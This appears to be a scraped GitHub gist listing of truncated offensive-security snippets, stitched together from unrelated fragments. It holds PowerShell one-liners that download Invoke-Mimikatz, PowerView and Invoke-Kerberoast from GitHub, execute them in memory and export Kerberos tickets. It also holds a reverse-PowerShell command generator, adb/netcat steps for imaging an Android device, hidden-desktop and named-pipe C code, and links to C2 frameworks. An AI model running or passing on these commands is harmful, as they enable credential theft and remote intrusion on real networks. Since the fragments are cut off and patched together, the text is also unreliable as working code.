I hereby claim:
- I am olivierlaflamme on github.
- I am olivierlaflamme (https://keybase.io/olivierlaflamme) on keybase.
- I have a public key ASCgiB3TsMKpS01EJ4ltypEUa8ZPzeCtdkxUIDweIzFfNgo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
ssh -L {LOCAL_PORT}:{HOST}:{REMOTE_PORT} {REMOTE_HOST} | |
Example | |
###ssh -L 3001:localhost:3001 username@host |
import json | |
filenames = [] | |
def findcred(dictionary): | |
for k, v in dictionary.items(): | |
if k == 'password' and dictionary['password']: | |
result = {} | |
if 'domainname' in dictionary: | |
result['domainname'] = dictionary['domainname'] |
# Invoke-Mimikatz.ps1 | |
$urls = @("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; $domain=((Get-WmiObject Win32_ComputerSystem).Domain); Add-Type -AssemblyName System.IdentityModel; iex $("setspn.exe -T $domain -Q */*") | Select-String '^CN' -Context 0,1 |% {New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim()}; Invoke-Mimikatz -Command "`"kerberos::list /export`"" | |
# Invoke-Kerberoast.ps1 | |
$urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast | |
# Invoke-Kerberoast.ps1 - Fix ':$ |
#define _GNU_SOURCE | |
#include <sched.h> | |
#include <unistd.h> | |
#include <stdlib.h> | |
#include <sys/wait.h> | |
#include <signal.h> | |
#include <fcntl.h> | |
#include <stdio.h> | |
#include <string.h> | |
#include <limits.h> |
#!/usr/bin/env python3 | |
# | |
# generate reverse powershell cmdline with base64 encoded args | |
# | |
import sys | |
import base64 | |
def help(): | |
print("USAGE: %s IP PORT" % sys.argv[0]) |
adb devices | |
adb push ./nc /sdcard/nc | |
adb forward tcp:4444 tcp:4444 | |
adb shell | |
su | |
cp /sdcard/nc /dev/nc | |
chmod 777 /dev/nc | |
dd if=/dev/block/mmblk0 bs 65535 | \ /dev/bc -nvlp 4444 | |
nc -nv 127.0.0.1 4444 > image.nand | |
sha256sum image.nand |
// To compile: gcc64.exe run.c -o run.exe | |
// To run: run.exe cmd.exe "/c whoami" | |
#include <Windows.h> | |
#include <stdio.h> | |
int main(int argc, char **argv) { | |
CHAR cDesktop[] = "hiddendesktop"; | |
HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL); |
client.c | |
#include <Windows.h> | |
#include <stdio.h> | |
#define MAX_SIZE 1024 | |
int main(int argc, char **argv) { | |
CHAR *remotePipeName = (CHAR*)GlobalAlloc(GPTR, MAX_SIZE); | |
DWORD dwWritten = 0; |
https://raw.githubusercontent.com/FortyNorthSecurity/C2concealer/3630a87e56a1e36ea0d907903fc9b7460419e71f/C2concealer/components/postex.py | |
https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/Payload_Type/apollo/agent_code/Apollo/CommandModules/SpawnTo.cs | |
https://raw.githubusercontent.com/kphongagsorn/c2-profiles/29fe50eaad655ddd0028fca06a9c7785e3ffaf41/amazon.profile | |
https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/documentation-payload/apollo/commands/spawnto_x64.md | |
https://raw.githubusercontent.com/TheRipperJhon/CAPE/2bc977577a8fcc81a46046fe5bf9248ed3ac0c28/modules/processing/parsers/malwareconfig/CobaltStrike.py | |
https://raw.githubusercontent.com/Tylous/SourcePoint/7bebe641d9c0d2dbc41c27ef621333f257cbd3e6/Struct/Struct.go | |
https://raw.githubusercontent.com/MythicAgents/Apollo/92958fc2c9511d738bc1cd2dd44405c650991014/documentation-payload/apollo/opsec.md | |
https://raw.githubusercontent.com/nsquar3/malware_analysis/e7f3070f4 |